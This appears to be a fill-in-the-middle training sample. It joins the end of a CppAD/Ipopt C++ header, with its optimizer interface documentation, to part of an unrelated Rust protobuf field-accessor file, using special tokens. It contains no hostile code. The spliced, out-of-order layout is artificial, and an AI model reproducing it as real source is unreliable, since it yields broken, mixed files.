If $icode k$$ in $latex \{0 , \ldots , K-1 \}$$ has type $code size_t$$,
$icode u$$ is an $code ADVector$$ of size $icode q(k)$$
and $icode r$$ is an $code ADVector$$ of size $icode p(k)$$
the syntax
$codei%
%r% = %fg_info%.eval_r(%k%, %u%)
%$$
set $icode r$$ to the vector $latex r_k (u)$$.
$subhead fg_info.retape$$
This member function has the prototype
$codei%
virtual bool cppad_ipopt_fg_info::retape(size_t %k%)
%$$
If $icode k$$ in $latex \{0 , \ldots , K-1 \}$$ has type $code size_t$$,
and $icode retape$$ has type $code bool$$,
the syntax
$codei%
%retape% = %fg_info%.retape(%k%)
%$$
sets $icode retape$$ to true or false.
If $icode retape$$ is true,
$code cppad_ipopt_nlp$$ will retape the operation sequence
corresponding to $latex r_k (u)$$ for
every value of $icode u$$.
An $code cppad_ipopt_nlp$$ object
should use much less memory and run faster if $icode retape$$ is false.
You can test both the true and false cases to make sure
the operation sequence does not depend on $icode u$$.
$pre
$$
The $code cppad_ipopt_fg_info$$ implementation of this function
sets $icode retape$$ to true
(while slower it is also safer to always retape).
$subhead fg_info.domain_size$$
This member function has prototype
$codei%
virtual size_t cppad_ipopt_fg_info::domain_size(size_t %k%)
%$$
If $icode k$$ in $latex \{0 , \ldots , K-1 \}$$ has type $code size_t$$,
and $icode q$$ has type $code size_t$$, the syntax
$codei%
%q% = %fg_info%.domain_size(%k%)
%$$
sets $icode q$$ to the dimension of the domain space for $latex r_k (u)$$;
i.e., $latex q(k)$$ in
the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
$pre
$$
The $code cppad_ipopt_h_base$$ implementation of this function
corresponds to the simple representation mentioned above; i.e.,
$latex q = n$$.
$subhead fg_info.range_size$$
This member function has prototype
$codei%
virtual size_t cppad_ipopt_fg_info::range_size(size_t %k%)
%$$
If $icode k$$ in $latex \{0 , \ldots , K-1 \}$$ has type $code size_t$$,
and $icode p$$ has type $code size_t$$, the syntax
$codei%
%p% = %fg_info%.range_size(%k%)
%$$
sets $icode p$$ to the dimension of the range space for $latex r_k (u)$$;
i.e., $latex p(k)$$ in
the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
$pre
$$
The $code cppad_ipopt_h_base$$ implementation of this function
corresponds to the simple representation mentioned above; i.e.,
$latex p = m+1$$.
$subhead fg_info.number_terms$$
This member function has prototype
$codei%
virtual size_t cppad_ipopt_fg_info::number_terms(size_t %k%)
%$$
If $icode k$$ in $latex \{0 , \ldots , K-1 \}$$ has type $code size_t$$,
and $icode L$$ has type $code size_t$$, the syntax
$codei%
%L% = %fg_info%.number_terms(%k%)
%$$
sets $icode L$$ to the number of terms in representation
for this value of $icode k$$;
i.e., $latex L(k)$$ in
the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
$pre
$$
The $code cppad_ipopt_h_base$$ implementation of this function
corresponds to the simple representation mentioned above; i.e.,
$latex L = 1$$.
$subhead fg_info.index$$
This member function has prototype
$codei%
virtual void cppad_ipopt_fg_info::index(
size_t %k%, size_t %ell%, SizeVector& %I%, SizeVector& %J%
)
%$$
The argument
$icode%
k
%$$
has type $codei size_t$$
and is a value between zero and $latex K-1$$ inclusive.
The argument
$icode%
ell
%$$
has type $codei size_t$$
and is a value between zero and $latex L(k)-1$$ inclusive.
The argument
$icode%
I
%$$ is a $cref SimpleVector$$ with elements
of type $code size_t$$ and size greater than or equal to $latex p(k)$$.
The input value of the elements of $icode I$$ does not matter.
The output value of
the first $latex p(k)$$ elements of $icode I$$
must be the corresponding elements of $latex I_{k,ell}$$
in the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
The argument
$icode%
J
%$$ is a $cref SimpleVector$$ with elements
of type $code size_t$$ and size greater than or equal to $latex q(k)$$.
The input value of the elements of $icode J$$ does not matter.
The output value of
the first $latex q(k)$$ elements of $icode J$$
must be the corresponding elements of $latex J_{k,ell}$$
in the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
$pre
$$
The $code cppad_ipopt_h_base$$ implementation of this function
corresponds to the simple representation mentioned above; i.e.,
for $latex i = 0 , \ldots , m$$,
$icode%I%[%i%] = %i%$$,
and for $latex j = 0 , \ldots , n-1$$,
$icode%J%[%j%] = %j%$$.
$head solution$$
After the optimization process is completed, $icode solution$$ contains
the following information:
$subhead status$$
The $icode status$$ field of $icode solution$$ has prototype
$codei%
cppad_ipopt_solution::solution_status %solution%.status
%$$
It is the final Ipopt status for the optimizer.
Here is a list of the possible values for the status:
$table
$icode status$$ $cnext Meaning
$rnext
not_defined $cnext
The optimizer did not return a final status to this $code cppad_ipopt_nlp$$
object.
$rnext
unknown $cnext
The status returned by the optimizer is not defined in the Ipopt
documentation for $code finalize_solution$$.
$rnext
success $cnext
Algorithm terminated successfully at a point satisfying the convergence
tolerances (see Ipopt options).
$rnext
maxiter_exceeded $cnext
The maximum number of iterations was exceeded (see Ipopt options).
$rnext
stop_at_tiny_step $cnext
Algorithm terminated because progress was very slow.
$rnext
stop_at_acceptable_point $cnext
Algorithm stopped at a point that was converged,
not to the 'desired' tolerances, but to 'acceptable' tolerances
(see Ipopt options).
$rnext
local_infeasibility $cnext
Algorithm converged to a non-feasible point
(problem may have no solution).
$rnext
user_requested_stop $cnext
This return value should not happen.
$rnext
diverging_iterates $cnext
It the iterates are diverging.
$rnext
restoration_failure $cnext
Restoration phase failed, algorithm doesn't know how to proceed.
$rnext
error_in_step_computation $cnext
An unrecoverable error occurred while Ipopt tried to
compute the search direction.
$rnext
invalid_number_detected $cnext
Algorithm received an invalid number (such as $code nan$$ or $code inf$$)
from the users function $icode%fg_info%.eval%$$ or from the CppAD evaluations
of its derivatives
(see the Ipopt option $code check_derivatives_for_naninf$$).
$rnext
internal_error $cnext
An unknown Ipopt internal error occurred.
Contact the Ipopt authors through the mailing list.
$tend
$subhead x$$
The $code x$$ field of $icode solution$$ has prototype
$codei%
NumberVector %solution%.x
%$$
and its size is equal to $latex n$$.
It is the final $latex x$$ value for the optimizer.
$subhead z_l$$
The $code z_l$$ field of $icode solution$$ has prototype
$codei%
NumberVector %solution%.z_l
%$$
and its size is equal to $latex n$$.
It is the final Lagrange multipliers for the
lower bounds on $latex x$$.
$subhead z_u$$
The $code z_u$$ field of $icode solution$$ has prototype
$codei%
NumberVector %solution%.z_u
%$$
and its size is equal to $latex n$$.
It is the final Lagrange multipliers for the
upper bounds on $latex x$$.
$subhead g$$
The $code g$$ field of $icode solution$$ has prototype
$codei%
NumberVector %solution%.g
%$$
and its size is equal to $latex m$$.
It is the final value for the constraint function $latex g(x)$$.
$subhead lambda$$
The $code lambda$$ field of $icode solution$$ has prototype
$codei%
NumberVector %solution%.lambda
%$$
and its size is equal to $latex m$$.
It is the final value for the
Lagrange multipliers corresponding to the constraint function.
$subhead obj_value$$
The $code obj_value$$ field of $icode solution$$ has prototype
$codei%
Number %solution%.obj_value
%$$
It is the final value of the objective function $latex f(x)$$.
$children%
cppad_ipopt/example/get_started.cpp%
cppad_ipopt/example/ode1.omh%
cppad_ipopt/speed/ode_speed.cpp
%$$
$head Example$$
The file
$cref ipopt_nlp_get_started.cpp$$ is an example and test of
$code cppad_ipopt_nlp$$ that uses the
$cref/simple representation/cppad_ipopt_nlp/Simple Representation/$$.
It returns true if it succeeds and false otherwise.
The section $cref ipopt_nlp_ode$$ discusses an example that
uses a more complex representation.
$head Wish List$$
This is a list of possible future improvements to
$code cppad_ipopt_nlp$$ that would require changed to the user interface:
$list number$$
The routine $codei%fg_info.eval_r(%k%, %u%)%$$ should also support
$codei NumberVector$$ for the type of the argument $code u$$
(this would certainly be more efficient when
$codei%fg_info.retape(%k%)%$$ is true and $latex L(k) > 1$$).
It could be an option for the user to provide this as well as
the necessary $code ADVector$$ definition.
$lnext
There should a $cref Discrete$$ routine that the user can call
to determine the value of $latex \ell$$ during the evaluation of
$codei%fg_info.eval_r(%k%, %u%)%$$.
This way data, which does not affect the derivative values,
can be included in the function recording and evaluation.
$lend
$end
-----------------------------------------------------------------------------
*/
# include <cppad/cppad.hpp>
# include <coin/IpIpoptApplication.hpp>
# include <coin/IpTNLP.hpp>
/*!
\file cppad_ipopt_nlp.hpp
\brief CppAD interface to Ipopt
\ingroup cppad_ipopt_nlp_cpp
*/
// ---------------------------------------------------------------------------
namespace cppad_ipopt {
// ---------------------------------------------------------------------------
/// A scalar value used to record operation sequence.
typedef CppAD::AD<Ipopt::Number> ADNumber;
/// A simple vector of values used to record operation sequence
typedef CppAD::vector<ADNumber> ADVector;
/// A simple vector of size_t values.
typedef CppAD::vector<size_t> SizeVector;
/// A simple vector of values used by Ipopt
typedef CppAD::vector<Ipopt::Number> NumberVector;
/*!
Abstract base class the user derives from to define the functions in the problem.
*/
class cppad_ipopt_fg_info
{
	/// allow cppad_ipopt_nlp class complete access to this class
	friend class cppad_ipopt_nlp;
private:
	/// domain space dimension for the functions f(x), g(x)
	size_t n_;
	/// range space dimension for the function g(x)
	size_t m_;
	/// the cppad_ipopt_nlp constructor uses this method to set n_
	void set_n(size_t n)
	{	n_ = n; }
	/// the cppad_ipopt_nlp constructor uses this method to set m_
	void set_m(size_t m)
	{	m_ = m; }
public:
	/// destructor virtual so user derived class destructor gets called
	virtual ~cppad_ipopt_fg_info(void)
	{ }
	/// number_functions; i.e. K (simple representation uses 1)
	virtual size_t number_functions(void)
	{	return 1; }
	/// function that evaluates the user's representation for f(x) and
	/// g(x); pure virtual, so the user must define it in a derived class
	virtual ADVector eval_r(size_t k, const ADVector& u) = 0;
	/// should the function r_k (u) be retaped whenever the argument
	/// u changes (default is true which is safe but slow)
	virtual bool retape(size_t k)
	{	return true; }
	/// domain_size q[k] for r_k (u) (simple representation uses n)
	virtual size_t domain_size(size_t k)
	{	return n_; }
	/// range_size p[k] for r_k (u) (simple representation uses m+1)
	virtual size_t range_size(size_t k)
	{	return m_ + 1; }
	/// number_terms that use r_k (u) (simple representation uses 1)
	virtual size_t number_terms(size_t k)
	{	return 1; }
	/// return the index vectors I_{k,ell} and J_{k,ell}
	/// (simple representation uses I[i] = i and J[j] = j)
	virtual void index(size_t k, size_t ell, SizeVector& I, SizeVector& J)
	{	assert( I.size() >= m_ + 1 );
		assert( J.size() >= n_ );
		for(size_t i = 0; i <= m_; i++)
			I[i] = i;
		for(size_t j = 0; j < n_; j++)
			J[j] = j;
	}
};
/*!
Class that contains information about the problem solution
\section Nonlinear_Programming_Problem Nonlinear Programming Problem
We are give smooth functions
\f$ f : {\bf R}^n \rightarrow {\bf R} \f$
and
\f$ g : {\bf R}^n \rightarrow {\bf R}^m \f$
and wish to solve the problem
\f[
\begin{array}{rcl}
{\rm minimize} & f(x) & {\rm w.r.t.} \; x \in {\bf R}^n
\\
{\rm subject \; to} & g^l \leq g(x) \leq g^u
\\
& x^l \leq x \leq x^u
\end{array}
\f]
\section Users_Representation Users Representation
The functions
\f$ f : {\bf R}^n \rightarrow {\bf R} \f$ and
\f$ g : {\bf R}^n \rightarrow {\bf R}^m \f$ are defined by
\f[
\left( \begin{array}{c} f(x) \\ g(x) \end{array} \right)
=
\sum_{k=0}^{K-1} \; \sum_{\ell=0}^{L(k) - 1}
[ (m+1) \otimes I_{k,\ell} ] \; \circ
\; r_k \; \circ \; [ J_{k,\ell} \otimes n ] \; (x)
\f]
where for \f$ k = 0 , \ldots , K-1\f$,
\f$ r_k : {\bf R}^{q(k)} \rightarrow {\bf R}^{p(k)} \f$.
\section Deprecated_Evaluation_Methods Evaluation Methods
The set of evaluation methods for this class is
\verbatim
{ eval_f, eval_grad_f, eval_g, eval_jac_g, eval_h }
\endverbatim
Note that the \c bool return flag for the evaluations methods
does not appear in the Ipopt documentation.
Looking at the code, it seems to be a flag telling Ipopt to abort
when the flag is false.
*/
class cppad_ipopt_solution
{
public:
	/// possible values for the solution status
	enum solution_status {
		not_defined,
		success,
		maxiter_exceeded,
		stop_at_tiny_step,
		stop_at_acceptable_point,
		local_infeasibility,
		user_requested_stop,
		feasible_point_found,
		diverging_iterates,
		restoration_failure,
		error_in_step_computation,
		invalid_number_detected,
		too_few_degrees_of_freedom,
		internal_error,
		unknown
	} status;
	/// the approximate solution
	NumberVector x;
	/// Lagrange multipliers corresponding to lower bounds on x
	NumberVector z_l;
	/// Lagrange multipliers corresponding to upper bounds on x
	NumberVector z_u;
	/// value of g(x)
	NumberVector g;
	/// Lagrange multipliers corresponding to constraints on g(x)
	NumberVector lambda;
	/// value of f(x)
	Ipopt::Number obj_value;
	/// constructor initializes solution status as not yet defined
	cppad_ipopt_solution(void)
	{	status = not_defined; }
};
/*!
Class connects Ipopt to CppAD for derivative and sparsity pattern calculations.
*/
class cppad_ipopt_nlp : public Ipopt::TNLP
{
private:
/// A Scalar value used by Ipopt
typedef Ipopt::Number Number;
/// An index value used by Ipopt
typedef Ipopt::Index Index;
/// Indexing style used in Ipopt sparsity structure
typedef Ipopt::TNLP::IndexStyleEnum IndexStyleEnum;
/// A simple vector of boolean values
typedef CppAD::vectorBool BoolVector;
/// A simple vector of AD function objects
typedef CppAD::vector< CppAD::ADFun<Number> > ADFunVector;
/// A simple vector of simple vectors of boolean values
typedef CppAD::vector<BoolVector> BoolVectorVector;
/// A mapping that is dense in i, sparse in j, and maps (i, j)
/// to the corresponding sparsity index in Ipopt.
typedef CppAD::vector< std::map<size_t,size_t> > IndexMap;
// ------------------------------------------------------------------
// Values directly passed in to the constructor
// ------------------------------------------------------------------
/// dimension of the domain space for f(x) and g(x)
/// (passed to ctor)
const size_t n_;
/// dimension of the range space for g(x)
/// (passed to ctor)
const size_t m_;
/// dimension of the range space for g(x)
/// (passed to ctor)
const NumberVector x_i_;
/// lower limit for x
/// (size n_), (passed to ctor)
const NumberVector x_l_;
/// upper limit for x
/// (size n_) (passed to ctor)
const NumberVector x_u_;
/// lower limit for g(x)
/// (size m_) (passed to ctor)
const NumberVector g_l_;
/// upper limit for g(x)
/// (size m_) (passed to ctor)
const NumberVector g_u_;
/// pointer to base class version of derived class object used to get
/// information about the user's representation for f(x) and g(x)
/// (passed to ctor)
cppad_ipopt_fg_info* const fg_info_;
/// pointer to object where final results are stored
/// (passed to ctor)
cppad_ipopt_solution* const solution_;
/// plus infinity as a value of type Number
const Number infinity_;
// ------------------------------------------------------------------
// Effectively const values determined during constructor using calls
// to fg_info:
// ------------------------------------------------------------------
/// The value of \f$ K \f$ in the representation.
/// (effectively const)
size_t K_;
/// Does operation sequence for \f$ r_k (u) \f$ depend on \f$ u \f$.
/// (size K_) (effectively const)
BoolVector retape_;
/// <tt>q_[k]</tt> is the domain space dimension for \f$ r_k (u) \f$
/// (size K_) (effectively const)
SizeVector q_;
/// <tt>p_[k]</tt> is the range space dimension for \f$ r_k (u) \f$
/// (size K_) (effectively const)
SizeVector p_;
/// <tt>L_[k]</tt> is number of times \f$ r_k (u) \f$ appears in
/// the representation summation
/// (size K_) (effectively const)
SizeVector L_;
// -------------------------------------------------------------------
// Other effectively const values determined by the constructor:
// -------------------------------------------------------------------
/*!
CppAD sparsity patterns for \f$ \{ r_k^{(1)} (u) \} \f$ (set by ctor).
For <tt>k = 0 , ... , K_-1, pattern_jac_r_[k]</tt>
is a CppAD sparsity pattern for the Jacobian of \f$ r_k (u) \f$
and as such it has size <tt>p_[k]*q_[k]</tt>.
(effectively const)
*/
BoolVectorVector pattern_jac_r_;
/*!
CppAD sparsity patterns for \f$ \{ r_k^{(2)} (u) \} \f$ (set by ctor).
For <tt>k = 0 , ... , K_-1, pattern_jac_r_[k]</tt>
is a CppAD sparsity pattern for the Hessian of
\f[
R(u) = \sum_{i=0}^{p[k]-1} r_k (u)_i
\f]
and as such it has size <tt>q_[k]*q_[k]</tt>.
(effectively const)
*/
BoolVectorVector pattern_hes_r_;
        /// number of non-zeros in the Ipopt sparsity structure for the Jacobian of g(x)
/// (effectively const)
size_t nnz_jac_g_;
        /// row indices in the Ipopt sparsity structure for the Jacobian of g(x)
/// (effectively const)
SizeVector iRow_jac_g_;
        /// column indices in the Ipopt sparsity structure for the Jacobian of g(x)
/// (effectively const)
SizeVector jCol_jac_g_;
        /// number of non-zeros in the Ipopt sparsity structure for the Hessian of the Lagrangian
/// (effectively const)
size_t nnz_h_lag_;
        /// row indices in the Ipopt sparsity structure for the Hessian of the Lagrangian
/// (effectively const)
SizeVector iRow_h_lag_;
        /// column indices in the Ipopt sparsity structure for the Hessian of the Lagrangian
/// (effectively const)
SizeVector jCol_h_lag_;
/*!
Mapping from (i, j) in Jacobian of g(x) to Ipopt sparsity structure
For <tt>i = 0 , ... , m_-1, index_jac_g_[i]</tt>
is a standard map from column index values \c j to the corresponding
index in the Ipopt sparsity structure for the Jacobian of g(x).
*/
IndexMap index_jac_g_;
/*!
Mapping from (i, j) in Hessian of fg(x) to Ipopt sparsity structure
For <tt>i = 0 , ... , n_-1, index_hes_fg_[i]</tt>
is a standard map from column index values \c j to the corresponding
        index in the Ipopt sparsity structure for the Hessian of the Lagrangian.
*/
IndexMap index_hes_fg_;
// -----------------------------------------------------------------
// Values that are changed by routine other than the constructor:
// -----------------------------------------------------------------
/// For <tt>k = 0 , ... , K_-1, r_fun_[k]</tt>
/// is a the CppAD function object corresponding to \f$ r_k (u) \f$.
ADFunVector r_fun_;
/*!
Is r_fun[k] OK for current x.
For <tt>k = 0 , ... , K_-1, tape_ok_[k]</tt>
is true if current operations sequence in <tt>r_fun_[k]</tt>
OK for this value of \f$ x \f$.
Note that \f$ u = [ J_{k,\ell} \otimes n ] (x) \f$ may depend on the
value of \f$ \ell \f$.
*/
BoolVector tape_ok_;
/// work space of size equal maximum of <tt>q[k]</tt> w.r.t \c k.
SizeVector J_;
/// work space of size equal maximum of <tt>p[k]</tt> w.r.t \c k.
SizeVector I_;
// ------------------------------------------------------------
// Private Methods
// ------------------------------------------------------------
/// block the default constructor from use
cppad_ipopt_nlp(const cppad_ipopt_nlp&);
/// blocks the assignment operator from use
cppad_ipopt_nlp& operator=(const cppad_ipopt_nlp&);
public:
// ----------------------------------------------------------------
// See cppad_ipopt_nlp.cpp for doxygen documentation of these methods
// ----------------------------------------------------------------
        /// only constructor for cppad_ipopt_nlp
cppad_ipopt_nlp(
size_t n ,
size_t m ,
const NumberVector &x_i ,
const NumberVector &x_l ,
const NumberVector &x_u ,
const NumberVector &g_l ,
const NumberVector &g_u ,
cppad_ipopt_fg_info* fg_info ,
cppad_ipopt_solution* solution
);
// use virtual so that derived class destructor gets called.
virtual ~cppad_ipopt_nlp();
// return info about the nlp
virtual bool get_nlp_info(
Index& n ,
Index& m ,
Index& nnz_jac_g ,
Index& nnz_h_lag ,
IndexStyleEnum& index_style
);
// return bounds for my problem
virtual bool get_bounds_info(
Index n ,
Number* x_l ,
Number* x_u ,
Index m ,
Number* g_l ,
Number* g_u
);
// return the starting point for the algorithm
virtual bool get_starting_point(
Index n ,
bool init_x ,
Number* x ,
bool init_z ,
Number* z_L ,
Number* z_U ,
Index m ,
bool init_lambda ,
Number* lambda
);
// return the objective value
virtual bool eval_f(
Index n ,
const Number* x ,
bool new_x ,
Number& obj_value
);
// Method to return the gradient of the objective
virtual bool eval_grad_f(
Index n ,
const Number* x ,
bool new_x ,
Number* grad_f
);
// return the constraint residuals
virtual bool eval_g(
Index n ,
const Number* x ,
bool new_x ,
Index m ,
Number* g
);
// Method to return:
// 1) The structure of the jacobian (if "values" is NULL)
// 2) The values of the jacobian (if "values" is not NULL)
virtual bool eval_jac_g(
Index n ,
const Number* x ,
bool new_x ,
Index m ,
Index nele_jac ,
Index* iRow ,
Index* jCol ,
Number* values
);
// Method to return:
// 1) structure of hessian of the lagrangian (if "values" is NULL)
// 2) values of hessian of the lagrangian (if "values" is not NULL)
virtual bool eval_h(
Index n ,
const Number* x ,
bool new_x ,
Number obj_factor ,
Index m ,
const Number* lambda ,
bool new_lambda ,
Index nele_hess ,
Index* iRow ,
Index* jCol ,
Number* values
);
// called when the algorithm is completed so the TNLP can
// store/write the solution
virtual void finalize_solution(
Ipopt::SolverReturn status ,
Index n ,
const Number* x ,
const Number* z_L ,
const Number* z_U ,
Index m ,
const Number* g ,
const Number* lambda ,
Number obj_value ,
const Ipopt::IpoptData* ip_data ,
Ipopt::IpoptCalculatedQuantities* ip_cq
);
virtual bool intermediate_callback(
Ipopt::AlgorithmMode mode,
Index iter,
Number obj_value,
Number inf_pr,
Number inf_du,
Number mu,
Number d_norm,
Number regularization_size,
Number alpha_du,
Number alpha_pr,
Index ls_trials,
const Ipopt::IpoptData* ip_data,
Ipopt::IpoptCalculatedQuantities* ip_cq
);
};
// ---------------------------------------------------------------------------
} // end namespace cppad_ipopt
// ---------------------------------------------------------------------------
# endif<|fim▁end|> | We define an $icode index vector$$ as a vector of non-negative integers |
<|file_name|>accessor.rs<|end_file_name|><|fim▁begin|>use core::Message;
use core::ProtobufEnum;
use core::message_down_cast;
use reflect::EnumValueDescriptor;
/// Type-erased accessor for a single field of a message.
///
/// This trait should not be used directly, use `FieldDescriptor` instead.
pub trait FieldAccessor {
    /// Field name as declared in the `.proto` file.
    fn name_generic(&self) -> &'static str;
    /// Whether the singular field is present in `m`.
    fn has_field_generic(&self, m: &Message) -> bool;
    /// Number of elements of the repeated field in `m`.
    fn len_field_generic(&self, m: &Message) -> usize;
    /// Value of a singular message-typed field.
    fn get_message_generic<'a>(&self, m: &'a Message) -> &'a Message;
    /// Element `index` of a repeated message-typed field.
    fn get_rep_message_item_generic<'a>(&self, m: &'a Message, index: usize) -> &'a Message;
    /// Descriptor of the current value of a singular enum field.
    fn get_enum_generic(&self, m: &Message) -> &'static EnumValueDescriptor;
    /// Descriptor of element `index` of a repeated enum field.
    fn get_rep_enum_item_generic(&self, m: &Message, index: usize) -> &'static EnumValueDescriptor;
    // Scalar accessors: one singular and one repeated getter per scalar type.
    fn get_str_generic<'a>(&self, m: &'a Message) -> &'a str;
    fn get_rep_str_generic<'a>(&self, m: &'a Message) -> &'a [String];
    fn get_bytes_generic<'a>(&self, m: &'a Message) -> &'a [u8];
    fn get_rep_bytes_generic<'a>(&self, m: &'a Message) -> &'a [Vec<u8>];
    fn get_u32_generic(&self, m: &Message) -> u32;
    fn get_rep_u32_generic<'a>(&self, m: &'a Message) -> &'a [u32];
    fn get_u64_generic(&self, m: &Message) -> u64;
    fn get_rep_u64_generic<'a>(&self, m: &'a Message) -> &'a [u64];
    fn get_i32_generic(&self, m: &Message) -> i32;
    fn get_rep_i32_generic<'a>(&self, m: &'a Message) -> &'a [i32];
    fn get_i64_generic(&self, m: &Message) -> i64;
    fn get_rep_i64_generic<'a>(&self, m: &'a Message) -> &'a [i64];
    fn get_bool_generic(&self, m: &Message) -> bool;
    fn get_rep_bool_generic<'a>(&self, m: &'a Message) -> &'a [bool];
    fn get_f32_generic(&self, m: &Message) -> f32;
    fn get_rep_f32_generic<'a>(&self, m: &'a Message) -> &'a [f32];
    fn get_f64_generic(&self, m: &Message) -> f64;
    fn get_rep_f64_generic<'a>(&self, m: &'a Message) -> &'a [f64];
}
// Object-safe helper traits that erase the concrete field type, so plain
// `fn` pointers taken from generated code can be stored behind trait objects.
/// Getter for a singular embedded-message field of `M`.
trait GetSingularMessage<M> {
    fn get_message<'a>(&self, m: &'a M) -> &'a Message;
}
/// Adapter holding a getter `fn` for a singular message field of type `N`.
struct GetSingularMessageImpl<M, N> {
    get: for<'a> fn(&'a M) -> &'a N,
}
impl<M : Message, N : Message + 'static> GetSingularMessage<M> for GetSingularMessageImpl<M, N> {
    fn get_message<'a>(&self, m: &'a M) -> &'a Message {
        // `&N` coerces to the `&Message` trait object since `N: Message`.
        (self.get)(m)
    }
}
/// Getter for a singular enum field of `M`.
trait GetSingularEnum<M> {
    fn get_enum(&self, m: &M) -> &'static EnumValueDescriptor;
}
/// Adapter holding a getter `fn` for a singular enum field of type `E`.
struct GetSingularEnumImpl<M, E> {
    get: fn(&M) -> E,
}
impl<M : Message, E : ProtobufEnum> GetSingularEnum<M> for GetSingularEnumImpl<M, E> {
    fn get_enum(&self, m: &M) -> &'static EnumValueDescriptor {
        // Map the enum value to its static descriptor.
        (self.get)(m).descriptor()
    }
}
/// Getter for a repeated embedded-message field of `M`.
trait GetRepeatedMessage<M> {
    fn len_field(&self, m: &M) -> usize;
    fn get_message_item<'a>(&self, m: &'a M, index: usize) -> &'a Message;
}
/// Adapter holding a slice getter `fn` for a repeated message field of type `N`.
struct GetRepeatedMessageImpl<M, N> {
    get: for<'a> fn(&'a M) -> &'a [N],
}
impl<M : Message, N : Message + 'static> GetRepeatedMessage<M> for GetRepeatedMessageImpl<M, N> {
    fn len_field(&self, m: &M) -> usize {
        (self.get)(m).len()
    }
    fn get_message_item<'a>(&self, m: &'a M, index: usize) -> &'a Message {
        // Indexing panics when `index` is out of bounds, like slice indexing.
        &(self.get)(m)[index]
    }
}
/// Getter for a repeated enum field of `M`.
trait GetRepeatedEnum<M> {
    fn len_field(&self, m: &M) -> usize;
    fn get_enum_item(&self, m: &M, index: usize) -> &'static EnumValueDescriptor;
}
/// Adapter holding a slice getter `fn` for a repeated enum field of type `E`.
struct GetRepeatedEnumImpl<M, E> {
    get: for<'a> fn(&'a M) -> &'a [E],
}
impl<M : Message, E : ProtobufEnum> GetRepeatedEnum<M> for GetRepeatedEnumImpl<M, E> {
    fn len_field(&self, m: &M) -> usize {
        (self.get)(m).len()
    }
    fn get_enum_item(&self, m: &M, index: usize) -> &'static EnumValueDescriptor {
        // Indexing panics when `index` is out of bounds, like slice indexing.
        (self.get)(m)[index].descriptor()
    }
}
/// Getter for a singular field: one variant per supported field kind.
/// Scalar variants store plain `fn` pointers; `Enum`/`Message` store boxed
/// adapters because those additionally erase the concrete value type.
enum SingularGet<M> {
    U32(fn(&M) -> u32),
    U64(fn(&M) -> u64),
    I32(fn(&M) -> i32),
    I64(fn(&M) -> i64),
    F32(fn(&M) -> f32),
    F64(fn(&M) -> f64),
    Bool(fn(&M) -> bool),
    String(for<'a> fn(&'a M) -> &'a str),
    Bytes(for<'a> fn(&'a M) -> &'a [u8]),
    Enum(Box<GetSingularEnum<M> + 'static>),
    Message(Box<GetSingularMessage<M> + 'static>),
}
/// Getter for a repeated field: one variant per supported element kind.
/// Scalar variants return the whole backing slice; `Enum`/`Message` store
/// boxed adapters that also provide per-item access.
enum RepeatedGet<M> {
    U32(for<'a> fn(&'a M) -> &'a [u32]),
    U64(for<'a> fn(&'a M) -> &'a [u64]),
    I32(for<'a> fn(&'a M) -> &'a [i32]),
    I64(for<'a> fn(&'a M) -> &'a [i64]),
    F32(for<'a> fn(&'a M) -> &'a [f32]),
    F64(for<'a> fn(&'a M) -> &'a [f64]),
    Bool(for<'a> fn(&'a M) -> &'a [bool]),
    String(for<'a> fn(&'a M) -> &'a [String]),
    Bytes(for<'a> fn(&'a M) -> &'a [Vec<u8>]),
    Enum(Box<GetRepeatedEnum<M> + 'static>),
    Message(Box<GetRepeatedMessage<M> + 'static>),
}
impl<M : Message> RepeatedGet<M> {
    /// Number of elements in the repeated field of `m`,
    /// regardless of the element kind.
    fn len_field(&self, m: &M) -> usize {
        match *self {
            RepeatedGet::U32(get) => get(m).len(),
            RepeatedGet::U64(get) => get(m).len(),
            RepeatedGet::I32(get) => get(m).len(),
            RepeatedGet::I64(get) => get(m).len(),
            RepeatedGet::F32(get) => get(m).len(),
            RepeatedGet::F64(get) => get(m).len(),
            RepeatedGet::Bool(get) => get(m).len(),
            RepeatedGet::String(get) => get(m).len(),
            RepeatedGet::Bytes(get) => get(m).len(),
            // Boxed adapters know their own length.
            RepeatedGet::Enum(ref get) => get.len_field(m),
            RepeatedGet::Message(ref get) => get.len_field(m),
        }
    }
}
/// Accessor functions for one field: either a singular field
/// (presence check plus getter) or a repeated field (slice/item getter).
enum FieldAccessorFunctions<M> {
    Singular { has: fn(&M) -> bool, get: SingularGet<M> },
    Repeated(RepeatedGet<M>),
}
/// Concrete `FieldAccessor` implementation for message type `M`.
struct FieldAccessorImpl<M> {
    // Field name as declared in the `.proto` file.
    name: &'static str,
    // Kind-specific getter functions for this field.
    fns: FieldAccessorFunctions<M>,
}
// Dispatches every type-erased accessor to the stored `fn` pointer after
// downcasting `&Message` to the concrete `&M` via `message_down_cast`.
// Calling a getter on a field of a different kind hits the `_ => panic!()`
// arm, so callers are expected to pick the getter matching the field type.
impl<M : Message + 'static> FieldAccessor for FieldAccessorImpl<M> {
    fn name_generic(&self) -> &'static str {
        self.name
    }
    fn has_field_generic(&self, m: &Message) -> bool {
        match self.fns {
            FieldAccessorFunctions::Singular { has, .. } => has(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn len_field_generic(&self, m: &Message) -> usize {
        match self.fns {
            FieldAccessorFunctions::Repeated(ref r) => r.len_field(message_down_cast(m)),
            _ => panic!(),
        }
    }
    // ---- singular getters ----
    fn get_message_generic<'a>(&self, m: &'a Message) -> &'a Message {
        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::Message(ref get), .. } =>
                get.get_message(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_enum_generic(&self, m: &Message) -> &'static EnumValueDescriptor {
        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::Enum(ref get), .. } =>
                get.get_enum(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_str_generic<'a>(&self, m: &'a Message) -> &'a str {
        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::String(get), .. } =>
                get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_bytes_generic<'a>(&self, m: &'a Message) -> &'a [u8] {
        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::Bytes(get), .. } =>
                get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_u32_generic(&self, m: &Message) -> u32 {
